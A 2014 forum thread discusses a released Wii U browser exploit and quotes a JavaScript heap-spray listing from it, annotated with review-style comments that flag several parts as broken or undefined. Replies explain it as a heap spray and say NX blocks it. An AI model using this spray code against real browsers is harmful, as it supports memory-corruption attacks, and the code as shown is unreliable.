
Official Wii U Browser Exploit Released

Posted: Tue Jun 17, 2014 12:50 pm
by BSnake
Maybe someone is interested in this:
http://www.maxconsole.com/maxcon_forums ... t-Released

I have not tested it or anything else.

Re: Official Wii U Browser Exploit Released

Posted: Fri Jun 20, 2014 6:45 pm
by shadyblue9o9
OK, I'm asking this just because I'm curious how the Wii U exploit is actually executed...

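function sprayOne(mem, size, v)
{
  // Allocate one spray element: a detached DOM text node whose character
  // data is `v` repeated, and park it in `mem` so it stays reachable.
  // `size` is the requested element size in 32-bit slots; the first 20 are
  // skipped, presumably to account for allocator/object header overhead
  // (the caller in dsm() starts at size 20) -- not verifiable from here.
  //
  // Note: String.fromCharCode applies ToUint16, so each UTF-16 unit of the
  // node's text is `v & 0xffff`, not the full 32-bit word -- with the
  // caller's 0x1dd7b2c8 the text is U+B2C8 repeated.
  if (size < 20)
    throw new RangeError("sprayOne: size must be >= 20, got " + size);

  var words = new Uint32Array(size - 20);
  for (var j = 0; j < words.length; j++)
    words[j] = v;

  // apply() over the typed array passes every element as one char code;
  // the copy the posted version made before apply() was redundant.
  var text = String.fromCharCode.apply(null, words);
  mem.push(document.createTextNode(text));
}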
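function spray(size, n)
{
  // Build the "code" spray string. `size` is in bytes; a UTF-16 unit is two
  // bytes, so the string is `size / 2` units long.
  var stringSize = size / 2;

  // "%u6000%u0000" decodes to the 32-bit word 0x60000000 (presumably a
  // PowerPC `nop`, the Wii U's architecture -- not verifiable from here).
  var str = unescape("%u6000%u0000");

  // NOTE(review): "%4bff%fffc" has no `%u` prefix, so unescape() yields the
  // six characters "K", "f", "f", U+00FF, "f", "c" rather than one 32-bit
  // word. It reads like a typo for "%u4bff%ufffc"; reproduced as posted.
  var filler = unescape("%4bff%fffc");

  while (str.length < stringSize)
    str += filler;

  var h1 = [];
  h1[0] = str.substring(0, stringSize);

  // As written this does NOT produce n copies: after the first pass h1 is
  // the string itself, and every later pass reduces it to its first
  // character. For size >= 2: n == 0 returns [str], n == 1 returns str,
  // n >= 2 returns str[0]. Presumably `h1[i] = ...` was intended; left as
  // posted. The only behavioural change here is declaring the loop index,
  // which was an implicit global and throws a ReferenceError in strict
  // mode (ES modules).
  for (var i = 1; i <= n; i++)
    h1 = unescape(h1[0]);

  return h1;
}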
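function sprayInc(n)
{
  // Build the "pointer" spray string: a table of 0x160 big-endian 32-bit
  // words, each encoded as two UTF-16 units (high half, low half), so the
  // string is 0x2c0 units long. Slot k holds the value k, except slots 0
  // and 0x10c, which hold 0x0e9a161c -- presumably the pointer value the
  // exploit wants read back (see the 0x660 remark in dsm); not verifiable
  // from this listing. This reproduces byte-for-byte the 22 unescape()
  // literals of the posted version, which hid that single irregular slot.
  var MARKER_WORD = unescape("%u0e9a%u161c");
  var MARKER_SLOT = 0x10c;
  var SLOT_COUNT = 0x160;

  var parts = [];
  for (var k = 0; k < SLOT_COUNT; k++)
  {
    if (k === 0 || k === MARKER_SLOT)
      parts.push(MARKER_WORD);
    else
      parts.push("\u0000" + String.fromCharCode(k));
  }
  var str = parts.join("");

  var h1 = [];
  h1[0] = str; // the posted str.substring(0, str.length) is a full copy

  // As written this does NOT produce n copies: after the first pass h1 is
  // the string itself, and every later pass reduces it to its first
  // character. n == 0 returns [str], n == 1 returns str, n >= 2 returns
  // str[0] (U+0E9A). Presumably `h1[i] = ...` was intended; left as posted.
  // The loop index is now declared: it was an implicit global, which throws
  // a ReferenceError in strict mode (ES modules).
  for (var i = 1; i <= n; i++)
    h1 = unescape(h1[0]);

  return h1;
}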

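function dsm(evnt)
{
  // Heap spray: allocate one text node for every element size from 20 to
  // 2047 (32-bit slots, see sprayOne), each filled with 0x1dd7b2c8, and
  // collect them in `mem`. `evnt` is accepted so this can be wired up as an
  // event handler, but it is not used.
  //
  // The posted version discarded `mem` on return; since the nodes are never
  // inserted into the document, that left nothing holding them and the
  // spray could be garbage-collected immediately. Returning the array
  // matches the commented-out `var mem = dsm();` call site and lets the
  // caller keep the spray alive.
  var mem = [];
  for (var j = 20; j < 2048; j++)
    sprayOne(mem, j, 0x1dd7b2c8);

  // Author's notes, kept verbatim (not verifiable from this listing):
  // the code pointer will be read from value + 0x660
  // 0x4 only if we spray 0
  return mem;
}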
// Top level as posted: only the "pointer" spray is live. The memory spray
// (dsm), the "code" spray and the length alerts are commented out, and
// sprayPointer() is not defined anywhere in this listing.
//var mem = dsm();
//alert(mem.length);
//var pointer = sprayPointer();
var pointer;
pointer = sprayInc(30000);
//var code = spray(0x2c0, 60000);

//alert(pointer.length);
//alert(code.length);[/spoiler]

So this is the code (in the spoiler) that I pulled from the exploit... It seems to me that they are using the amount of memory allotted to the string to achieve the exploit. I'm assuming that on the Wii U, when the string is appended to itself over and over, it eventually exceeds the amount of memory it is allowed to hold, effectively overwriting important data, and that is what causes the crash. Then var h1 gets the actual address of it so that the user can later inject the code?

I'm kind of new to this. I've had about a year of C++ programming under my belt, and none of that deals with deliberately causing a buffer overflow... but a lot of it has been fixing my own out-of-range, overflow, and memory-leak errors... :) .. so am I somewhat right, hopefully? lol

Also, I believe the reason the exploit does not crash the Vita and just reloads the page is that once the maximum amount of memory the string is allowed to hold is reached, the browser just reloads the page (like a refresh) to clear the previous data... instead of letting the string continue to write data where it shouldn't :S

Re: Official Wii U Browser Exploit Released

Posted: Fri Jun 20, 2014 6:58 pm
by Omega2058
Going by the function names and what the code does, it simply sprays a string in increments across memory (a heap spray). Also, the NX bit is enabled, so the sprayed data is not executable and it won't work regardless.

I guess you're somewhat close.

Re: Official Wii U Browser Exploit Released

Posted: Fri Jun 20, 2014 7:41 pm
by shadyblue9o9
lol... sorry. Well, I tried it on my PS4 as well, just to see what it would do, and it says there is not enough system memory =_=

Re: Official Wii U Browser Exploit Released

Posted: Mon Aug 04, 2014 2:54 pm
by BSnake
Update:
Right now, Wii U system software versions from 4.0.0 up to and including 5.1.0 are supported.
Source

Re: Official Wii U Browser Exploit Released

Posted: Fri Jan 09, 2015 12:16 pm
by jiakhaan
OK, thanks BSnake.